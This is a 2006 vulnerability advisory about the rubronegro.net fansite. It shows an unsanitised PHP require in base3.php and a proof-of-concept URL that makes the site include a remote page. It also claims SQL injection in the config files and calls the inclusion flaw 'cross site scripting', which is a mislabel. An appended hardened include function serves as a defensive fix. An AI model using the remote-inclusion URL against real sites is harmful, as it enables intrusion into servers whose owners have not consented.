rubronegrodotnet.txt

26 Feb 2006 00:00:00 | Reported by Rephumos | Type: packetstorm | Source: packetstormsecurity.com

Rubronegro.net, fansite for Atlético Paranaense, has Cross Site Scripting and SQL Injection vulnerabilities

`Author: Rephumos  
Date: 22.feb.2006  
URL: http://www.rubronegro.net  
  
  
  
--- Description:  
  
Rubronegro.net is a fansite for the Brazilian soccer team Atlético Paranaense.  
  
  
  
--- Vulnerability - Cross scripting:  
  
The website has a cross-site scripting issue, taken from the code below:  
  
$temp = $path."/".$link;  
require $temp;  
  
On lines 40 and 41 of www.rubronegro.net/base3.php  
  
Example: The following link -  
http://www.rubronegro.net/base3.php?path=clube/baixada&link=patrimonio_hist  
Accesses the file patrimonio_hist (with no extension) in the clube/baixada folder.  
  
It can be easily changed to access the last 100 advisories of the Packet Storm Security website, like this:  
http://www.rubronegro.net/base3.php?path=http://www.packetstormsecurity.org&link=advisories100.html  
  
The code enables the website to be processed as if it were on the server.  
  
  
  
--- Vulnerability - SQL Injection:  
  
The following files:  
base/config.lib.php  
base/function.lib.new.php  
  
are accessible with the information above and vulnerable to SQL injections.  
  
  
  
--- Status:  
  
Vulnerability found: 10 feb 2006  
Vulnerability notified: 11 feb 2006  
Published after no response: 22 feb 2006  
  
  
--- Greetings:  
  
To my homies and all Brazilian hackers around ;D`
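
The `require` on request-controlled `path` and `link` quoted in the advisory is a file-inclusion pattern. The following is an added example, not code from the advisory or the site, showing one way to constrain such an include to local files under a fixed directory. The function name `resolve_page`, the page root and the demo tree are assumptions.

```php
<?php
declare(strict_types=1);

// Added example: hardened replacement for `require $path."/".$link;`.
// resolve_page() and the page directory layout are assumptions, not the site's code.
// Defense in depth: keep allow_url_include = Off in php.ini.

function resolve_page($path, $link, string $root): ?string
{
    // Query parameters can arrive as arrays (?path[]=x); accept strings only.
    if (!is_string($path) || !is_string($link)) {
        return null;
    }
    // Only slash-separated plain names: no scheme, dots, backslashes or NUL bytes.
    // The D modifier stops "$" from matching before a trailing newline.
    $candidate = $path . '/' . $link;
    if (!preg_match('#^[A-Za-z0-9_-]+(?:/[A-Za-z0-9_-]+)*$#D', $candidate)) {
        return null;
    }
    // Resolve symlinks, then confirm the file still sits under the root.
    $rootReal = realpath($root);
    $fileReal = realpath($root . '/' . $candidate);
    if ($rootReal === false || $fileReal === false || !is_file($fileReal)) {
        return null;
    }
    $prefix = $rootReal . DIRECTORY_SEPARATOR;
    return strncmp($fileReal, $prefix, strlen($prefix)) === 0 ? $fileReal : null;
}

// Constructed demo: a temporary page tree and the two requests from the advisory.
$root = sys_get_temp_dir() . '/pages_demo_' . getmypid();
@mkdir($root . '/clube/baixada', 0700, true);
file_put_contents($root . '/clube/baixada/patrimonio_hist', "<p>demo page</p>\n");

$requests = [
    ['clube/baixada', 'patrimonio_hist'],                          // legitimate page
    ['http://www.packetstormsecurity.org', 'advisories100.html'],  // remote URL from the advisory
    ['clube/baixada', '../../config'],                             // constructed traversal input
    [['x'], 'patrimonio_hist'],                                    // constructed array parameter
];
foreach ($requests as [$path, $link]) {
    $file = resolve_page($path, $link, $root);
    $shown = is_string($path) ? $path : 'array';
    echo $shown, ' / ', $link, ' => ', $file === null ? 'rejected (404)' : 'require ' . $file, "\n";
}
```

In a real handler the caller would pass `$_GET['path'] ?? ''` and `$_GET['link'] ?? ''`, answer 404 on `null`, and `require` only the returned path.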
